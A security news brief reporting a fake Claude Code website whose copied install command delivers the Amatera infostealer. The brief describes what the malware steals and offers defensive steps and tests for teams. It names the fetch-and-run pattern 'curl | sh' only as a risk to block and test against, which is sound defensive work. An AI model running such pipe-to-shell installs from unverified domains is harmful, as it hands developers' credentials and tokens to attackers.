Fake Claude Code site drops Amatera info…

ANTHROPIC PUB_DATE: 2026.03.10

FAKE CLAUDE CODE SITE DROPS AMATERA INFOSTEALER VIA ONE‑LINE INSTALLS

A convincing fake Claude Code website is tricking developers into installing the Amatera infostealer via copy-paste CLI commands. Attackers cloned Anthropic’s ...

A convincing fake Claude Code website is tricking developers into installing the Amatera infostealer via copy-paste CLI commands.

Attackers cloned Anthropic’s Claude Code site so well that every link routes to the real product, except the one-line install command. Paste it into macOS, PowerShell, or CMD and you get malware instead, a pattern dubbed InstallFix. The payload here is Amatera, which steals browser passwords, session tokens, autofill data, and crypto wallets, and the pages may be hosted on legitimate platforms like Cloudflare Pages and Squarespace Lifehacker.

This targets the dev habit of copying shell installers from docs, turning a moment of inattention into code execution. If your team uses Claude Code or similar tools, verify domains, avoid curl | sh installers, prefer signed packages, and pin install steps in internal docs. WebProNews has a solid overview of the clone and workflow risks WebProNews.

[ WHY_IT_MATTERS ]

01.

Developer workstations hold repo creds and session tokens; an infostealer there can cascade into source, CI, and cloud compromise.

02.

The attack piggybacks on normal CLI install habits, so traditional email or browser filters may never trigger.

[ WHAT_TO_TEST ]

terminal
Run a tabletop: can engineers distinguish the real Claude Code domain and installer from a pixel-perfect clone, and do they verify checksums or signatures?
terminal
Attempt to install via curl | sh from a non-allowlisted domain on a managed laptop and confirm your controls block or flag it.

[ BROWNFIELD_PERSPECTIVE ]

Legacy codebase integration strategies...

01.
Add an allowlist for installer domains and enforce package-manager-only installs for dev tools across macOS and Windows endpoints.
02.
Update onboarding docs to pin vetted install commands and require checksum/signature verification; remove any one-liners that pipe to shell.

[ GREENFIELD_PERSPECTIVE ]

Fresh architecture paradigms...

01.
Ship internal tools via signed packages in official repos (Homebrew, winget, apt) instead of copy-paste installers.
02.
Bake in workstation hardening: least-privilege local accounts, EDR that flags script-from-web execution, and DNS filtering for lookalike domains.

arrow_back

PREVIOUS_DATA_LOG

Claude Code v2.1.72 trims friction: faster shell parsing, fewer prompts, per-call model overrides

Initialize_Return_to_Core

LINK_STATUS: 127.0.0.1 (SECURE)

NEXT_DATA_LOG

Copilot rolls out GPT-5.4 across IDEs: bigger context, sharper coding, rising token burn

arrow_forward